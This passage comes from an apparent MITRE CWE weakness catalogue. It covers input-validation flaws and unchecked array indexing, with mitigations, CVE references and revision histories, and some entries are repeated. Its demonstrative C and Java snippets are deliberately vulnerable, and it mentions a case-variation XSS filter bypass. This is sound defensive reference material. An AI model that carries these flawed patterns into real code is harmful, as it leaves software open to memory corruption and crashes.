could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. + + + + /* capture the sizes of all messages */ + int getsizes(int sock, int count, int *sizes) { + ...char buf[BUFFER_SIZE];int ok;int num, size; + + // read values from socket and added to sizes array + while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ + + + // continue read from socket until buf only contains '.' + if (DOTLINE(buf))break; + else if (sscanf(buf, "%d %d", &num, &size) == 2) { + if (num > 0 && num <= (unsigned)count)sizes[num - 1] = size; + else + + + /* warn about possible attempt to induce buffer overflow */ + report(stderr, "Warning: ignoring bogus data for message sizes returned by server.\n"); + + + } + }... + + } + + + + In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index. + + + + // Method called from servlet to obtain product information + public String displayProductSummary(int index) { + + String productSummary = new String(""); + try {String productSummary = getProductSummary(index); + + } catch (Exception ex) {...} + return productSummary; + } + public String getProductSummary(int index) {return products[index];} + + In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. + + + + // Method called from servlet to obtain product information + public String displayProductSummary(int index) { + + String productSummary = new String(""); + try {String productSummary = getProductSummary(index); + + } catch (Exception ex) {...} + return productSummary; + } + public String getProductSummary(int index) { + String productSummary = ""; + if ((index >= 0) && (index < MAX_PRODUCTS)) {productSummary = products[index];}else {System.err.println("index is out of bounds");throw new IndexOutOfBoundsException();} + return productSummary; + } + + An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds. + + ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {productSummary = (String) productArray.get(index);} catch (IndexOutOfBoundsException ex) {...} + + + + The following example asks a user for an offset into an array to select an item. + + + int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("User selected %s\n", items[index-1]);} + + The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). + + + + + CVE-2005-0369 + large ID in packet used as array index + https://www.cve.org/CVERecord?id=CVE-2005-0369 + + + CVE-2001-1009 + negative array index as argument to POP LIST command + https://www.cve.org/CVERecord?id=CVE-2001-1009 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-06-24 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax. + + Often, complex inputs are expected to follow a particular syntax, which is either assumed by the input itself, or declared within metadata such as headers. The syntax could be for data exchange formats, markup languages, or even programming languages. When untrusted input is not properly validated for the expected syntax, attackers could cause parsing failures, trigger unexpected errors, or expose latent vulnerabilities that might not be directly exploitable if the input had conformed to the syntax. + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + High + + + + + The following code loads and parses an XML file. + + + + // Read DOM + try {...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );} catch(Exception ex) {...} + + The XML file is loaded without validating it against a known XML Schema or DTD. + + + + + CVE-2016-4029 + Chain: incorrect validation of intended decimal-based IP address format (CWE-1286) enables parsing of octal or hexadecimal formats (CWE-1389), allowing bypass of an SSRF protection mechanism (CWE-918). + https://www.cve.org/CVERecord?id=CVE-2016-4029 + + + CVE-2007-5893 + HTTP request with missing protocol version number leads to crash + https://www.cve.org/CVERecord?id=CVE-2007-5893 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-06-24 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type. + + When input does not comply with the expected type, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities that would not be possible if the input conformed with the expected type. + This weakness can appear in type-unsafe programming languages, or in programming languages that support casting or conversion of an input to another type. + + + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + High + + + + + CVE-2008-2223 + SQL injection through an ID that was supposed to be numeric. + https://www.cve.org/CVERecord?id=CVE-2008-2223 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-06-24 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent. + + Some input data can be structured with multiple elements or fields that must be consistent with each other, e.g. a number-of-items field that is followed by the expected number of elements. When such complex inputs are inconsistent, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities. + + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + High + + + + + CVE-2018-16733 + product does not validate that the start block appears before the end block + https://www.cve.org/CVERecord?id=CVE-2018-16733 + + + CVE-2006-3790 + size field that is inconsistent with packet size leads to buffer over-read + https://www.cve.org/CVERecord?id=CVE-2006-3790 + + + CVE-2008-4114 + system crash with offset value that is inconsistent with packet size + https://www.cve.org/CVERecord?id=CVE-2008-4114 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-06-24 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value. + + Attackers can sometimes bypass input validation schemes by finding inputs that appear to be safe, but will be dangerous when processed at a lower layer or by a downstream component. For example, a simple XSS protection mechanism might try to validate that an input has no "<script>" tags using case-sensitive matching, but since HTML is case-insensitive when processed by web browsers, an attacker could inject "<ScrIpT>" and trigger XSS. + + + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + High + + + + + CVE-2021-39155 + Chain: A microservice integration and management platform compares the hostname in the HTTP Host header in a case-sensitive way (CWE-178, CWE-1289), allowing bypass of the authorization policy (CWE-863) using a hostname with mixed case or other variations. + https://www.cve.org/CVERecord?id=CVE-2021-39155 + + + CVE-2020-11053 + Chain: Go-based Oauth2 reverse proxy can send the authenticated user to another site at the end of the authentication flow. A redirect URL with HTML-encoded whitespace characters can bypass the validation (CWE-1289) to redirect to a malicious site (CWE-601) + https://www.cve.org/CVERecord?id=CVE-2020-11053 + + + CVE-2005-0269 + File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters. + https://www.cve.org/CVERecord?id=CVE-2005-0269 + + + CVE-2001-1238 + Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped. + https://www.cve.org/CVERecord?id=CVE-2001-1238 + + + CVE-2004-2214 + HTTP server allows bypass of access restrictions using URIs with mixed case. + https://www.cve.org/CVERecord?id=CVE-2004-2214 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2020-06-24 + 4.1 + 2020-02-24 + + + CWE Content Team + MITRE + 2021-10-28 + updated Description + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array. + + + + + + + + + + Resultant + The most common condition situation leading to an out-of-bounds array index is the use of loop index variables as buffer indexes. If the end condition for the loop is subject to a flaw, the index can grow or shrink unbounded, therefore causing a buffer overflow or underflow. Another common situation leading to this condition is the use of a function's return value, or the resulting value of a calculation directly as an index in to a buffer. + + + + + + + + + + out-of-bounds array index + + + index-out-of-range + + + array index underflow + + + + + Implementation + + + High + + + Integrity + Availability + DoS: Crash, Exit, or Restart + Use of an index that is outside the bounds of an array will very likely result in the corruption of relevant memory and perhaps instructions, leading to a crash, if the values are outside of the valid memory area. + + + Integrity + Modify Memory + If the memory corrupted is data, rather than instructions, the system will continue to function with improper values. + + + Confidentiality + Integrity + Modify Memory + Read Memory + Use of an index that is outside the bounds of an array can also trigger out-of-bounds read or write operations, or operations on the wrong objects; i.e., "buffer overflows" are not always the result. This may result in the exposure or modification of sensitive data. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow and possibly without the use of large inputs if a precise index can be controlled. + + + Integrity + Availability + Confidentiality + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + Read Memory + Modify Memory + A single fault could allow either an overflow (CWE-788) or underflow (CWE-786) of the array index. What happens next will depend on the type of operation being performed out of bounds, but can expose sensitive information, cause a system crash, or possibly lead to arbitrary code execution. + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report array index errors that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. + + High + This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + Black Box + Black box methods might not get the needed code coverage within limited time constraints, and a dynamic test might not produce any noticeable side effects even if it is successful. + + + + + Architecture and Design + Input Validation + Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173). + + + Architecture and Design + + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings. + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, Ada allows the programmer to constrain the values of a variable and languages such as Java and Ruby will allow the programmer to handle exceptions when an out-of-bounds index is accessed. + + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + Operation + Environment Hardening + + Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. + For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. + + Defense in Depth + This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When accessing a user-controlled array index, use a stringent range of values that are within the target array. Make sure that you do not allow negative values to be used. That is, verify the minimum as well as the maximum of the range of acceptable values. + + + + Implementation + Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + + + In the code snippet below, an untrusted integer value is used to reference an object in an array. + + public String getValue(int index) {return array[index];} + + If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised. + + + The following example takes a user-supplied value to allocate an array of objects and then operates on the array. + + private void buildList ( int untrustedListSize ){if ( 0 > untrustedListSize ){die("Negative value supplied for list size, die evil hacker!");}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();} + + This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown. + + + In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method + + int getValueFromArray(int *array, int len, int index) { + + int value; + + // check that the array index is less than the maximum + + + // length of the array + if (index < len) { + + // get the value at the specified index of the array + value = array[index]; + } + // if array index is invalid then output error message + + + // and return value indicating error + else {printf("Value is: %d\n", array[index]);value = -1;} + return value; + } + + However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. + + + ... + + // check that the array index is within the correct + + + // range of values for the array + if (index >= 0 && index < len) { + ... + + + + The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index. + + + + /* capture the sizes of all messages */ + int getsizes(int sock, int count, int *sizes) { + ...char buf[BUFFER_SIZE];int ok;int num, size; + + // read values from socket and added to sizes array + while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ + + // continue read from socket until buf only contains '.' + if (DOTLINE(buf))break; + else if (sscanf(buf, "%d %d", &num, &size) == 2)sizes[num - 1] = size; + + }... + + } + + In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. + + + + /* capture the sizes of all messages */ + int getsizes(int sock, int count, int *sizes) { + ...char buf[BUFFER_SIZE];int ok;int num, size; + + // read values from socket and added to sizes array + while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){ + + + // continue read from socket until buf only contains '.' + if (DOTLINE(buf))break; + else if (sscanf(buf, "%d %d", &num, &size) == 2) { + if (num > 0 && num <= (unsigned)count)sizes[num - 1] = size; + else + + + /* warn about possible attempt to induce buffer overflow */ + report(stderr, "Warning: ignoring bogus data for message sizes returned by server.\n"); + + + } + }... + + } + + + + In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index. + + + + // Method called from servlet to obtain product information + public String displayProductSummary(int index) { + + String productSummary = new String(""); + try {String productSummary = getProductSummary(index); + + } catch (Exception ex) {...} + return productSummary; + } + public String getProductSummary(int index) {return products[index];} + + In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code. + + + + // Method called from servlet to obtain product information + public String displayProductSummary(int index) { + + String productSummary = new String(""); + try {String productSummary = getProductSummary(index); + + } catch (Exception ex) {...} + return productSummary; + } + public String getProductSummary(int index) { + String productSummary = ""; + if ((index >= 0) && (index < MAX_PRODUCTS)) {productSummary = products[index];}else {System.err.println("index is out of bounds");throw new IndexOutOfBoundsException();} + return productSummary; + } + + An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds. + + ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {productSummary = (String) productArray.get(index);} catch (IndexOutOfBoundsException ex) {...} + + + + The following example asks a user for an offset into an array to select an item. + + + int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("You selected %s\n", items[index-1]);} + + The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). + + + + + CVE-2005-0369 + large ID in packet used as array index + https://www.cve.org/CVERecord?id=CVE-2005-0369 + + + CVE-2001-1009 + negative array index as argument to POP LIST command + https://www.cve.org/CVERecord?id=CVE-2001-1009 + + + CVE-2003-0721 + Integer signedness error leads to negative array index + https://www.cve.org/CVERecord?id=CVE-2003-0721 + + + CVE-2004-1189 + product does not properly track a count and a maximum number, which can lead to resultant array index overflow. + https://www.cve.org/CVERecord?id=CVE-2004-1189 + + + CVE-2007-5756 + Chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error. + https://www.cve.org/CVERecord?id=CVE-2007-5756 + + + CVE-2005-2456 + Chain: array index error (CWE-129) leads to deadlock (CWE-833) + https://www.cve.org/CVERecord?id=CVE-2005-2456 + + + + Memory + + + + Unchecked array indexing + + + INDEX - Array index overflow + + + ARR00-C + Understand how arrays work + + + ARR30-C + Do not form or use out-of-bounds pointers or array subscripts + CWE More Specific + + + ARR38-C + Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element + + + INT32-C + Ensure that operations on signed integers do not result in overflow + + + IDS32-PL + Validate any integer that is used as an array index + Imprecise + + + ASCSM-CWE-129 + + + SFP8 + Faulty Buffer Access + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness can precede uncontrolled memory allocation (CWE-789) in languages that automatically expand an array when an index is used that is larger than the size of the array, such as JavaScript. + An improperly validated array index might lead directly to the always-incorrect behavior of "access of array using out-of-bounds index." + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Common_Consequences, Observed_Examples, Other_Notes, Potential_Mitigations, Theoretical_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Common_Consequences, Demonstrative_Examples, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-09-19 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples, Potential_Mitigations, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unchecked Array Indexing + + + + The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset. + + In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. The security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes). A decoder decodes the bus transactions to map security identifiers into necessary access-controls/protections. + A common weakness that can exist in this scenario is incorrect decoding because an untrusted agent's security identifier is decoded into a trusted agent's security identifier. Thus, an untrusted agent previously without access to an asset can now gain access to the asset. + + + + + + + + + + + + + + + Implementation + + + Architecture and Design + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + DoS: Resource Consumption (Other) + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Quality Degradation + High + + + + + Architecture and Design + Security identifier decoders must be reviewed for design consistency and common weaknesses. + + + Implementation + Access and programming flows must be tested in pre-silicon and post-silicon testing in order to check for this weakness. + + + + + + + Consider a system that has four bus masters and a decoder. The decoder is supposed to decode every bus transaction and assign a corresponding security identifier. The security identifier is used to determine accesses to the assets. The bus transaction that contains the security information is Bus_transaction [15:14], and the bits 15 through 14 contain the security identifier information. The table below provides bus masters as well as their security identifiers and trust assumptions: + + + Bus MasterSecurity Identifier DecodingTrust Assumptions + Master_0"00"Untrusted + Master_1"01"Trusted + Master_2"10"Untrusted + Master_3"11"Untrusted + + + The assets are the AES-Key registers for encryption or decryption. The key is 128 bits implemented as a set of four 32-bit registers. The AES_KEY_ACCESS_POLICY is used to define which agents with a security identifier in the transaction can access the AES-key registers. The 